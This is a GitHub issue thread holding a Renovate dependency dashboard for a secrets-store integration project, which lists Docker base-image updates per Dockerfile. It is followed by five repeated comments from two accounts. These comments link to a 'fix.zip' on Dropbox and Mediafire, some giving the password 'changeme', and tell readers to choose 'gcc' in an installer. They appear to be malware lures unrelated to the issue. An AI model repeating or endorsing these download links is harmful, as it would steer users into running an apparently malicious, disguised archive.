### ISSUE TITLE
Dependency Dashboard

### ISSUE THREAD

**Issue by alexey-igrychev** [deckhouse/secrets-store-integration#12]
This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.

## Open

These updates have all been created already. Click a checkbox below to force a retry/rebase of any.

 - [ ] [Pin dependencies](../pull/10) (`alpine`, `golang`, `registry.deckhouse.io/base_images/distroless`, `registry.deckhouse.io/base_images/golang`)
 - [ ] [Update registry.deckhouse.io/base_images/golang Docker tag](../pull/11)
 - [ ] [Update alpine Docker tag to v3.20](../pull/13)
 - [ ] [Update golang Docker tag to v1.22.3](../pull/14)
 - [ ] **Click on this checkbox to rebase all open PRs at once**

## Detected dependencies

<details><summary>dockerfile</summary>
<blockquote>

<details><summary>images/csi-node-driver-registrar/Dockerfile</summary>

 - `registry.deckhouse.io/base_images/golang 1.20.5-alpine3.18`
 - `registry.deckhouse.io/base_images/distroless latest`

</details>

<details><summary>images/csi-secrets-store-driver/Dockerfile</summary>

 - `alpine 3.18`
 - `registry.deckhouse.io/base_images/golang 1.21.4-alpine3.18`
 - `registry.deckhouse.io/base_images/distroless latest`

</details>

<details><summary>images/env-injector/Dockerfile</summary>

 - `registry.deckhouse.io/base_images/golang 1.22.3-alpine`
 - `registry.deckhouse.io/base_images/distroless latest`

</details>

<details><summary>images/livenessprobe/Dockerfile</summary>

 - `registry.deckhouse.io/base_images/golang 1.20.5-alpine3.18`
 - `registry.deckhouse.io/base_images/distroless latest`

</details>

<details><summary>images/vault-csi-provider/Dockerfile</summary>

 - `golang 1.20.5-alpine3.18`
 - `registry.deckhouse.io/base_images/distroless latest`

</details>

<details><summary>images/vault-secrets-webhook/Dockerfile</summary>

 - `registry.deckhouse.io/base_images/golang 1.22.3-alpine`
 - `registry.deckhouse.io/base_images/distroless latest`

</details>

</blockquote>
</details>

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
